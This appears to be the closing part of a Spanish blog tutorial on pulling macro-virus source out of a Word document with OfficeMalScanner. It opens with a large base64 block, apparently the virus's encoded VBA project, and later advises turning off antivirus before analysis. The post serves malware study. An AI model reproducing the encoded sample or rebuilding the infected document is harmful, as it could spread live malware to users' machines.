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
87YAAAvwBAAAABI0Vng=



Nota: yo cree el archivo Doc1.xml con el office 2007, si ustedes crean el documento con otra versión, creo que el offset cambiara, así que para que encuentren la parte que van a remplazar tienen que buscar la cadena:

">QWN0aXZlTWltZQAAAfAEAAAA"  

que en mi caso fue el offset 000025B1 y llegar hasta la cadena:

"AAAvwBAAAABI0Vng="

que en el mio fue 00003392

ahora ya que hemos remplazado el código del documento Doc1.xml, aguardamos los cambios, y ahora si intentan abrir el archivo Doc1 verán que si se logra abrir.

y nos iremos ala ficha programador y damos clic en la opción Visual Basic verán que el código del project(Doc1) se encuentra con clave


así que ahora para poder extraer el código fuente del virus el archivo Doc1.xml lo cambiaremos a Documento habilitado como macro de word

para eso damos clic en archivo y luego en guardar como y elegimos dicha opción



Nota: si les a párese un mensaje den clic en aceptar

después de esto se creara un archivo en forma comprimida, como si fuera un .rar



como ven pienso que este archivo lo podemos abrir con el winrar, así que daremos doble clic en el y lo abrimos.

después de a ver lo abierto extraemos el archivo "vbaProject.bin" que se encuentra en la carpeta word



para eso damos clic derecho sobre el y luego clic en extraer sin pedir confirmación

Nota: de aquí en adelante es necesario apagar el antivirus ya que este no les dejara analizarlo

ahora para poder analizar el archivo "vbaProject.bin" usaremos una herramienta llamada "OfficeMalScanner"que descargaremos de aquí:

http://www.reconstructer.org/code.html


Nota:pueden mover el archivo  "vbaProject.bin"  a donde esta la herramienta "OfficeMalScanner" para que seles haga mas fácil

luego de a ver la descargada usaremos el símbolo del sistema y teclearemos el siguiente comando

"officemalscanner vbaproject.bin  info"

asi como se muestra en la imagen




luego daremos aceptar y nos a roja esto




y como podrán ver después de esto se creara una carpeta llamada "VBAPROJECT.BIN-Macros" con algunos archivos adentro.

estos archivos si los analizan verán que contiene parte del código del virus, les digo parte porque no creo que sea el código completo ya que si se acuerdan el proyecto tenia contraseña y pienso que para poder ver el código completo es necesario averiguar la contraseña


bueno saludos Flamer y eso es todo amigos aquí les dejo el link del mi vídeo que realice de este tema


https://www.youtube.com/watch?v=j6srzbKdnOE














No hay comentarios.:

Publicar un comentario